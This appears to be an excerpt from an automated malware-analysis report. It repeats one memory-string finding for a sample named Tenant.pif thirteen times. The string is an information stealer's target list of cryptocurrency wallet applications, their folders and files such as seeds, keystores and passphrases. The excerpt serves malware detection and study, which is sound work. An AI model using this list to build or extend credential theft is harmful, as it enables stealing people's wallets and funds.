                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
